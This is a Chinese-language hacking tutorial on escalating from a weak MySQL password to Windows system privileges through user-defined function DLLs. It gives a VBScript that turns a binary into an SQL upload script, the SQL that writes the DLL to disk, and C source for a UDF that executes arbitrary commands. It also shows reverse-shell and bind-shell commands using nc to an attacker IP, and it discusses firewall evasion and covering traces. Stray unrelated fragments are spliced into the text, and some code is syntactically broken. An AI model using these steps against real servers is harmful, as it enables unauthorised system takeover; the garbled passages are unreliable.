教你如何通过Mysql弱⼝令得到系统权限
很早⽹上就有了⽤mysql弱⼝令得到webshell教程,但是这次我要说的不是得到webshell,⽽是直接得到系统权限,看清楚了,是“直接”得到!
⾸先,我简单说⼀下mysql弱⼝令得到系统权限得过程:⾸先利⽤mysql脚本上传udf dll⽂件,然后利⽤注册UDF DLL中⾃写的Function 函数,⽽执⾏任意命令。
思路很简单,⽹上也有⼀些教程,但是他们要么没有给具体的代码,要么⼀句话代过,搞得象我似得⼩菜很难理解,终于在我付出了⼏天得不断测试得⾟勤劳动后,有了点结果,我把详细过程和相关代码得交给⼤家,这样⼤家就可以⾃⼰写dll⽂件,⾃⼰⽣成不同⽂件得⼆进制码啦!
下⾯,我们先说如何⽣成⼆进制⽂件得上传脚本。看看这段mysql脚本代码(⽹友Mix⽤的⽅法):
set @a = concat('',0x0123abc1312389…..);
set @a = concat(@a,0x4658978abc545e……);
format读音
………………….
create table Mix(data LONGBLOB);//建表Mix,字段为data,类型为longblob
insert into Mix values("");update Mix set data = @a;//@a插⼊表Mix
select data from Mix into DUMPFILE 'C:\\Winnt\\⽂件名';//导出表中内容为⽂件
前两句很熟悉把,这个就是我们以前注⼊的时候,绕过’的解决办法,把代码的16进制数声明给⼀个变量,然后导⼊这个变量就⾏了。只不过这⾥,因为16进制代码是⼀个⽂件的内容,代码太长了,所以就⽤了concat函数不断把上次得代码类加起来,这样不断累计到⼀个变量a中。后⾯⼏句就很简单了,我都有注释。
后⾯三句好说,但是前⾯的那么多16进制数据,⼿⼯的话,累⼈啊!不过你还记得以前有⼀个exe2bat.vbs脚本吗?这次我们可以把这个脚本修改⼀下后,得到我们这⾥需要得mysql脚本!对⽐exe2bat.vbs⽣成得⽂件和我们需要脚本的⽂件格式,我们可以轻松的得到我们所需的脚本。脚本内容如下:
fp=wscript.arguments(0
fn=right(fp,len(fp)-instrrev(fp,"\"))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536
with createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)
.write "set @a = concat('',0x"
for i=1 to sl
bt=ascb(midb(str,i,1))
zblog图片本地化if bt<16 then .write "0"
.write hex(bt)
if i mod 128=0 then .write ");" vbcrlf "set @a = concat(@a,0x"
next
end with
好了,现在只要你把所要上传的⽂件拖到这个脚本图标上⾯,就可以⽣成⼀个同名的txt⽂件了。这个txt⽂件,就是我们所需要的mysql脚本,当然我们还需要修改⼀下这个txt⽂件(毕竟他是我们偷⼯减料得来的!),把最后⼀⾏⽣成的多余的那句“set @a =
concat('',0x”删除了,加上建表,插值得那三句代码即可!
脚本⽣成了,如何上传?先登陆mysql服务器:
C:\>mysql –u root –h hostip –p
Mysql>use mysql; //先进⼊mysql默认得数据库,否则你下⼀步的表将不知道属于哪个库
Mysql>\. E:\*.; //这⼉就是你⽣成的mysql脚本
按照上⾯输⼊命令,就可以看见屏幕⽂字飞快闪烁(当然⽹速要快啦),不⼀会你的⽂件旧上传完毕了!
下⾯到达我们的重点,我们上传什么dll⽂件?就⽬前我再⽹上看到的有两个已经写好的dll⽂件,⼀个是Mix写得mix.dll,⼀个是envymask 写得my_udf.dll,这两个我都⽤过,都很不错,但是都也有点不⾜。先来看看具体的使⽤过程吧!
先⽤mix.dll:
登陆mysql,输⼊命令:
Mysql> \. e:\;
Mysql> CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\windows\\mix.dll';
//这⼉的注册的Mixconnect就是在我们dll⽂件中实现的函数,我们将要⽤他执⾏系统命令!
Mysql> select Mixconnect('你的ip','8080'); //填写你的反弹ip和端⼝是什么意思数学
过⼀会⼉,你监听8080端⼝的nc,就会得到⼀个系统权限的shell了!如图1:
这个的确不错,通过反弹得到得shell可以传过⼀些防⽕墙,可惜的是,它的这个函数没有写得很好,只能执⾏⼀次,当你第⼆次连接数据库后,再次运⾏“select Mixconnect('你的ip','8080');”的时候,对⽅的mysql会当掉!报错,然后服务停⽌!
所以,使⽤mix.dll你只有⼀次成功,没有再来⼀次的机会!另外根据我的测试,他对Win2003的系统好像不起作⽤。
再⽤my_udf.dll:
Mysql>\. C:\my_
Mysql> CREATE FUNCTION my_udfdoor RETURNS STRING SONAME 'C:\\winnt\\my_udf.dll';
//同样地,my_udfdoor也是我们注册后,⽤来执⾏系统命令得函数
Mysql> select my_udfdoor('’); //这⼉可以随便写my_udfdoor得参数,相当于我们只是要激活这个函数
好了,现在你可以不⽤关这个shell了,我们再开⼀个cmd,使⽤:
D:\>nc hostip 3306
*
4.0.*-nt x$Eo~MCG f**k //看到这个后,输⼊“f**k” ,他是my_udfdoor默认密码,⾃⼰⽆法更改创新驱动发展战略的时代意义举例子
过⼀会⼉,你就有了系统权限的shell了,
由于他是hook recv版,所以穿墙的能⼒很强,我是在上⼀个mix.dll反弹失败的情况下,才使⽤这个得,
他果然不负所望!进系统后,发现它有双⽹卡,天⽹防⽕墙个⼈版V2.73,对外仅仅开放3306端⼝,由此可见,my_udf.dll确实有很强的穿透防⽕墙得能⼒!但是他也有⼀个bug,就是再我们连接激活这个函数后(就是使⽤了命令“select my_udfdoor('’);”后),不管你是否连接,只要执⾏了:
Mysql>drop function my_udfdoor; 后,mysql也汇报错,然后挂掉,
所以,你使⽤这个dll⽂件⽆法删除你的痕迹!
最后,然我们⾃⼰写⼀个⾃定义的dll⽂件。看能不能解决问题。
我们仅仅使⽤mysql 得udf的⽰例作模版即可!看他的⽰例:
#include <stdlib.h>
#include <winsock.h>
#include <mysql.h>
extern "C" {
char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,
char *error);
mysql是什么系统// 兼容C
}
char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,
collecting stamps
char *error)
{
char * me = "my name";
return me;
// 调⽤此UDF将返回 my name
}
⼗分简单吧?好,我们只需要稍微改⼀下就可以有了⾃⼰的dll⽂件了:
下⾯是我的⼀个哥们Crackme是修改的:
#include <stdlib.h>
#include <windows.h>
#include "mysql.h"
extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);// sys_name就是函数名,你可以任意修改
__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) //当然这⼉的sys_name也得改!
{
char me[256] = {0};
if (args->arg_count == 1){
strncpy(me,args->args[0],args->lengths[0]);
me[args->lengths[0]]='\0';
WinExec(me,SW_HIDE); //就是⽤它来执⾏任意命令
}else
strcpy(me,"do nonthing.\n");
return me;
}
好,我们编译成sysudf.dll⽂件就可以了!我们来⽤他实验⼀把!
看操作:
Mysql>\. C:\
Mysql>Create function sys_name returns string soname 'C:\\windows\\sysudf.dll';
Mysql>\. //把nc.exe也上传上去
Mysql>select sys_name('nc.exe - 我的ip 8080');
//sys_name参数只有⼀个,参数指定要执⾏的系统命令
好,看看在Win2003中的⼀个反弹shell了,
当然,我们你也可以不反弹shell了,⽽去执⾏其他命令,只不过不论是否执⾏成功,都没有回显,所以要保证命令格式正确。对于这个dll ⽂件,经过测试,不论何时“drop function sys_name;”,都是不会报错的,同时也可以多次运⾏不同命令。⾄于他的缺点,就是他的穿墙能⼒跟Mix.dll⼀样不算太强,但对于实在穿不透的墙,直接运⾏其他命令就是最好的选择了。
上⾯三个dll⽂件可谓各有所短,如何选择,就看你遇到的实际情况了。
好了,从脚本得编写使⽤到dll⽂件编写使⽤,说了这么多,现在⼤家应该都会了吧?题⽬说的是弱⼝令得到系统权限,但是如果你在注⼊等其他过程中,爆出了config.php中的mysql密码,不也是可以使⽤的吗?这样我们岂不是也到继Serv-u后⼜⼀⼤提权⽅法了吗?

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。